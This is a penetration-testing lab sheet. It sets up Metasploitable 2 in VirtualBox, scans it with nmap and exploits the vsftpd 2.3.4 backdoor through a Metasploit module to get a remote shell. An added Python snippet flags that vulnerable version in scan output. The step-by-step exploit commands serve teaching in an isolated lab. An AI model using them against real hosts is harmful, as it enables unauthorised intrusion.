ICS Lab
TASK 9
Introduction to operations on Metasploit framework and Scripting for penetration
testing – Recon and Enumeration scripts
Aim: To use Metasploit framework to perform reconnaissance and penetration testing
The Metasploit Framework console is started with the command ‘msfconsole’ in the Kali Linux
terminal (preferably as root).
Installing Metasploitable 2 in VirtualBox
Metasploitable 2 is an intentionally vulnerable version of Ubuntu designed for testing
security tools and demonstrating common vulnerabilities. The steps to install Metasploitable
2 in VirtualBox are as follows:
1. Download Metasploitable 2
2. Setting up Metasploitable 2 in VirtualBox
3. Connecting the Metasploitable 2 to NAT Network
4. Start the Metasploitable 2 Virtual Machine
Step 1:
After downloading, extract the files from the Metasploitable 2 zip folder and find the file with the
.vmdk extension, which has to be imported into the virtual machine.
Step 2:
Open Oracle VM VirtualBox Manager
● Go to Machine. Click the New button to create a new Virtual Machine.
● Set the following details.
○ Name: Metasploitable 2
○ Type: Linux.
○ Version: Ubuntu (64-Bit)
Click Next to Proceed
Allocate the memory size (preferably 1024 MB)
Select the radio button which says “Use an existing virtual hard drive file”
Click on the folder icon on the right side
Click on Add and select the .vmdk file in your extracted folder.
Click on Create to continue.
● The Virtual Machine of the Victim - Metasploitable 2 is successfully created.
Step 3:
In Oracle VM VirtualBox, go to File > Preferences > Network
Click Add new NAT network, then Edit selected NAT network
Rename the network as you prefer, e.g. “Network N”, and change the Network
CIDR to the IP range you prefer, e.g. 192.168.10.0/24, and then click OK
Now we need to connect Kali Linux and Metasploitable 2 to this NAT Network N
Select the appropriate Virtual Machine—in this case, Metasploitable 2 —
and then right-click on it to select the Settings option.
● The Settings window would appear.
● Click on the Network icon on the left-hand side and change the “Attached to” drop-down
box from NAT to NAT Network in Adapter 1 and click on OK
Repeat the same process for Kali Linux
Now both are connected to the NAT Network “Network N”
Step 4:
Now, start both machines in VirtualBox
For Metasploitable 2, the default username and password are msfadmin and msfadmin,
and for Kali Linux you can use the root login
Sanity checks are performed to evaluate whether the installations are working properly and
the required configurations are in place.
1. Connectivity between Kali Linux & Metasploitable 2 Virtual Machine.
Now, type the command ‘ifconfig’ in the terminal of kali linux
Now, type the command ‘ifconfig’ in the terminal of Metasploitable 2
Note down the IP addresses of both, e.g. 192.168.10.4 for Kali Linux and 192.168.10.5 for
Metasploitable 2
To check the connectivity between the two machines use the ‘ping’ command, e.g. ping
192.168.10.5 from the Kali Linux machine to get a reply from the Metasploitable 2 machine, and
vice versa
Exploiting the Metasploitable 2 machine through metasploit in kali linux:
In this process the aim is to find a vulnerable point in the Metasploitable 2 machine from
Metasploit in Kali Linux and use that point as a backdoor entry to gain complete access to the
Metasploitable 2 machine.
Now, from the Kali Linux Metasploit terminal, use nmap to find the services and their versions on
the Metasploitable 2 machine
“nmap -sV 192.168.10.5”
-sV enables service and version detection: nmap probes each open port to identify the
service running on it and that service's version, and
192.168.10.5 is the IP address of the Metasploitable 2 machine
Now, it will show a list of ports which are open, closed and restricted, along with their
services and the versions.
This information is enough to find a vulnerable point to do the exploitation.
In this case we have a vulnerable point in ‘port 21 tcp’, which is ‘open’; the service under
it is ‘ftp’, whose version is ‘vsftpd 2.3.4’
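The same reading of the nmap output, written as a check that can be re-run after the service is patched. This is an added example, not part of the original lab sheet: the sample scan output is constructed, the function names are hypothetical, and the watch list holds only the version named in this lab.

```python
import re

# Constructed sample of `nmap -sV` terminal output (not captured from a real scan).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.10.5
Host is up (0.00040s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 2.3.4
22/tcp   open     ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open     http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp  filtered netbios-ssn
"""

# Watch list entries: (service name, regex on the version banner, remediation note).
WATCHLIST = [
    ("ftp", re.compile(r"^vsftpd 2\.3\.4\b"),
     "backdoored release; replace the package"),
]

# One port row: "<port>/<proto> <state> <service> [version banner]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)"
    r"\s+(?P<service>\S+)\s*(?P<version>.*)$")

def parse_services(nmap_text):
    """Return one dict per port row; header and status lines are skipped."""
    rows = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            row["version"] = row["version"].strip()
            rows.append(row)
    return rows

def flag_services(rows, watchlist=WATCHLIST):
    """Return (port, proto, version, note) for open ports matching the watch list."""
    findings = []
    for row in rows:
        if row["state"] != "open":
            continue  # filtered/closed ports expose no reachable service
        for service, pattern, note in watchlist:
            if row["service"] == service and pattern.search(row["version"]):
                findings.append((row["port"], row["proto"], row["version"], note))
    return findings

if __name__ == "__main__":
    for port, proto, version, note in flag_services(parse_services(SAMPLE_NMAP_OUTPUT)):
        print(f"{port}/{proto}: {version} -> {note}")
```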
Now, we have to exploit this vulnerability using the following commands
msf6 > search vsftpd 2.3.4
It will give a list of matching modules, numbered from 0 to n
In this case, we have only one exploit, listed as number 0.
Now we can gain more information about this exploit by the command
‘info 0’ or ‘info exploit/unix/ftp/vsftpd_234_backdoor’
Now, keeping this info, we are going to use this exploit by the command
‘use 0’ or ‘use exploit/unix/ftp/vsftpd_234_backdoor’
After this, the prompt changes to show the path of the selected exploit
Now, we have to use the command ‘set RHOSTS 192.168.10.5’
where RHOSTS is the target option we learned about from the info command and 192.168.10.5
is the IP address of Metasploitable 2
After this, we have to set the payload. For that, we need to know the payload information.
Use the command ‘show payloads’ to obtain payload information.
After obtaining the payload information, type the command ‘set payload cmd/unix/interact’
Now, after setting RHOSTS and the payload, we have to use the ‘run’ command.
Now, we can see that we have gained access to the Metasploitable 2 machine from the
Kali Linux machine through Metasploit. To confirm it, type the command ‘ifconfig’ in the msf
terminal; it shows the IP address of Metasploitable 2, which is 192.168.10.5. This signifies that
we have gained access to that machine through the vulnerable point that we analysed.
RESULT:
Thus the Metasploit Framework was used to analyse a vulnerability, and the vulnerability has been assessed.